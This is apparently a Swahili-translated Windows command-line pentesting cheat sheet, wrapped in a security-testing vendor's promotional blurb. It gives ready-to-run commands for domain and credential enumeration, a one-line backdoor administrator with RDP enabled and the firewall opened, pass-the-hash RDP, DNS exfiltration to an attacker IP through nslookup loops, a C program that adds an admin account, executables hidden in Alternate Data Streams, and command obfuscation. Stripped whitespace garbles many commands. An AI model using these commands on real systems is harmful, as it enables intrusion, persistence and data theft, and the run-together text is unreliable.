Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu
Pata na ripoti mapungufu makubwa, yanayoweza kutumiwa ambayo yana athari halisi za kibiashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia matumizi ya moja kwa moja kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.
wmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get architecturesysteminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmiccomputersystemLISTfull#Get PC infowmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicqfelistbrief#UpdateshostnameDRIVERQUERY#3rd party driver vulnerable?
Mazingira
set#List all environment variables
Some env variables to highlight:
COMPUTERNAME: Jina la kompyuta
TEMP/TMP: Folda ya muda
USERNAME: Jina lako la mtumiaji
HOMEPATH/USERPROFILE: Katalogi ya nyumbani
windir: C:\Windows
OS:Windows OS
LOGONSERVER: Jina la kidhibiti cha eneo
USERDNSDOMAIN: Jina la eneo la kutumia na DNS
USERDOMAIN: Jina la eneo
nslookup%LOGONSERVER%.%USERDNSDOMAIN%#DNS request for DC
schtasks/query/foLIST/v#Verbose out of scheduled tasksschtasks/query/foLIST2>nul|findstrTaskNameschtasks/query/foLIST/v>schtasks.txt; catschtask.txt|grep"SYSTEM\|Task To Run"|grep-B1SYSTEMtasklist/V#List processestasklist/SVC#links processes to started servicesnetstart#Windows Services startedwmicservicelistbrief#List servicesscquery#List of servicesdir/a"C:\Program Files"#Installed softwaredir/a"C:\Program Files (x86)"#Installed softwareregqueryHKEY_LOCAL_MACHINE\SOFTWARE#Installed software
Taarifa za Kikoa
# Generic AD infoecho%USERDOMAIN%#Get domain nameecho%USERDNSDOMAIN%#Get domain nameecho%logonserver%#Get name of the domain controllersetlogonserver#Get name of the domain controllersetlog#Get name of the domain controllergpresult/V# Get current policy appliedwmicntdomainlist/format:list#Displays information about the Domain and Domain Controllers# Usersdsqueryuser#Get all usersnetuser/domain#List all users of the domainnetuser<ACCOUNT_NAME>/domain#Get information about that usernetaccounts/domain#Password and lockout policywmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic/NAMESPACE:\\root\directory\ldapPATHds_userGETds_samaccountname#Get all userswmic/NAMESPACE:\\root\directory\ldapPATHds_userwhere"ds_samaccountname='user_name'"GET# Get info of 1 userswmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groupsnetgroup/domain#List of domain groupsnet localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
netgroup"Domain Admins"/domain#List users with domain admin privilegesnetgroup"domain computers"/domain#List of PCs connected to the domainnetgroup"Domain Controllers"/domain#List PC accounts of domains controllerswmicgrouplist/format:list# Information about all local groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupGETds_samaccountname#Get all groupswmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computersdsquerycomputer#Get all computersnetview/domain#Lis of PCs of the domainnltest/dclist:<DOMAIN>#List domain controllerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_samaccountname#All computerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_dnshostname#All computers# Trust relationsnltest/domain_trusts#Mapping of the trust relationships# Get all objects inside an OUdsquery*"CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
Magogo & Matukio
#Make a security query using another credentialswevtutilqesecurity/rd:true/f:text/r:helpline/u:HELPLINE\zachary/p:0987654321
Watumiaji & Vikundi
Watumiaji
#Mewhoami/all#All info about me, take a look at the enabled tokenswhoami/priv#Show only privileges# Local usersnetusers#All usersdir/b/ad"C:\Users"netuser%username%#Info about a user (me)netaccounts#Information about password requirementswmicUSERACCOUNTGetDomain,Name,Sidnetuser/add [username] [password] #Create user# Other users loogedqwinsta#Anyone else logged in?#Lauch new cmd.exe with new creds (to impersonate in network)runas/netonly/user<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Check current logon session as administrator using logonsessions from sysinternalslogonsessions.exelogonsessions64.exe
Makundi
#Localnetlocalgroup#All available groupsnetlocalgroupAdministrators#Info about a group (admins)netlocalgroupadministrators [username] /add #Add user to administrators#Domainnetgroup/domain#Info about domain groupsnetgroup/domain<domain_group_name>#Users that belongs to the group
Orodha ya vikao
qwinsta
klist sessions
Sera ya Nywila
net accounts
Akreditif
cmdkey/list#List credentialvaultcmd/listcreds:"Windows Credentials"/all#List Windows vaultrundll32keymgr.dll,KRShowKeyMgr#You need graphical access
Uthibitisho na watumiaji
# Add domain user and put them in Domain Admins groupnetuserusernamepassword/ADD/DOMAINnetgroup"Domain Admins"username/ADD/DOMAIN# Add local user and put them local Administrators groupnetuserusernamepassword/ADDnetlocalgroupAdministratorsusername/ADD# Add user to insteresting groups:netlocalgroup"Remote Desktop Users"UserLoginName/addnetlocalgroup"Debugger users"UserLoginName/addnetlocalgroup"Power users"UserLoginName/add
Mtandao
Interfaces, Routes, Ports, Hosts na DNSCache
ipconfig/all#Info about interfacesrouteprint#Print available routesarp-a#Know hostsnetstat-ano#Opened ports?typeC:\WINDOWS\System32\drivers\etc\hostsipconfig/displaydns|findstr"Record"|findstr"Name Host"
Firewall
netshfirewallshowstate# FW info, open portsnetshadvfirewallfirewallshowrulename=allnetshfirewallshowconfig# FW infoNetshAdvfirewallshowallprofilesNetShAdvfirewallsetallprofilesstateoff#Turn OffNetShAdvfirewallsetallprofilesstateon#Trun Onnetshfirewallsetopmodedisable#Turn Off#How to open portsnetshadvfirewallfirewalladdrulename="NetBIOS UDP Port 138"dir=outaction=allowprotocol=UDPlocalport=138netshadvfirewallfirewalladdrulename="NetBIOS TCP Port 139"dir=inaction=allowprotocol=TCPlocalport=139netshfirewalladdportopeningTCP3389"Remote Desktop"#Enable Remote Desktopreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netshfirewalladdportopeningTCP3389"Remote Desktop"::netshfirewallsetserviceremotedesktopenable#I found that this line is not needed::scconfigTermServicestart=auto#I found that this line is not needed::netstartTermservice#I found that this line is not needed#Enable Remote Desktop with wmicwmicrdtogglewhereAllowTSConnections="0"callSetAllowTSConnections"1"##orwmic/node:remotehostpathWin32_TerminalServiceSettingwhereAllowTSConnections="0"callSetAllowTSConnections"1"#Enable Remote assistance:regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer”/vfAllowToGetHelp/tREG_DWORD/d1/fnetshfirewallsetserviceremoteadminenable#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::ConnecttoRDP (using hashorpassword)xfreerdp/u:alice/d:WORKGROUP/pth:b74242f37e47371aff835a6ebcac4ffe/v:10.11.1.49xfreerdp/u:hacker/d:WORKGROUP/p:Hacker123!/v:10.11.1.49
Hisa
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
cd#Get current dircdC:\path\to\dir#Change dirdir#List current dirdir/a:hC:\path\to\dir#List hidden filesdir/s/b#Recursive list without shittime#Get current timedate#Get current dateshutdown/r/t0#Shutdown nowtype<file>#Cat file#Runasrunas/savecred/user:WORKGROUP\Administrator"\\10.XXX.XXX.XXX\SHARE\evil.exe"#Use saved credentialsrunas/netonly/user:<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Hideattrib+hfile#Set Hiddenattrib-hfile#Quit Hidden#Give full control over a file that you ownsicacls<FILE_PATH>/t/e/p<USERNAME>:Ficacls<FILE_PATH>/e/r<USERNAME>#Remove the permision#Recursive copy to smbxcopy/hievryC:\Users\security\.yawcam \\10.10.14.13\name\win#exe2bat to transform exe file in bat file#ADSdir/r#Detect ADSmorefile.txt:ads.txt#read ADSpowershell (Get-Content file.txt-Streamads.txt)# Get error messages from codenethelpmsg32#32 is the code in that case
Kupita Uwekaji Mipaka wa Karakteri Nyeusi
echo%HOMEPATH:~6,-11%#\who^ami#whoami
DOSfuscation
Inazalisha mstari wa CMD uliofichwa
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.gitcd Invoke-DOSfuscationImport-Module .\Invoke-DOSfuscation.psd1Invoke-DOSfuscationhelpSET COMMAND type C:\Users\Administrator\Desktop\flag.txtencoding
for /f tokens technique: Hii inatuwezesha kutekeleza amri, kupata maneno ya kwanza X ya kila mstari na kuyatumia kupitia DNS kwenda kwenye seva yetu.
for /f %a in ('whoami') do nslookup %a <IP_kali>#Get whoamifor /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>#Get word2for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali>#List folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali>#List that folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali>#Same as last one#More complex commandsfor /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
Unaweza pia kupeleka matokeo, kisha kusoma.
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
Kuita CMD kutoka kwa msimbo wa C
#include<stdlib.h>/* system, NULL, EXIT_FAILURE */// When executed by Administrator this program will create a user and then add him to the administrators group// i686-w64-mingw32-gcc addmin.c -o addmin.exe// upx -9 addmin.exeintmain (){int i;i=system("net users otherAcc 0TherAcc! /add");i=system("net localgroup administrators otherAcc /add");return0;}
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
## Selected Examples of ADS Operations ##### Adding Content to ADS #### Append executable to a log file as an ADStypeC:\temp\evil.exe>"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"# Download a script directly into an ADScertutil.exe-urlcache-split-fhttps://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1c:\temp:ttt### Discovering ADS Content #### List files and their ADSdir/R# Use Sysinternals tool to list ADS of a filestreams.exe<c:\path\to\file>### Extracting Content from ADS #### Extract an executable stored in an ADSexpandc:\ads\file.txt:test.exec:\temp\evil.exe### Executing ADS Content #### Execute an executable stored in an ADS using WMICwmicprocesscallcreate'"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'# Execute a script stored in an ADS using PowerShellpowershell-epbypass-<c:\temp:ttt
Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu
Pata na ripoti kuhusu udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kuongeza mamlaka, na tumia matumizi ya moja kwa moja kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.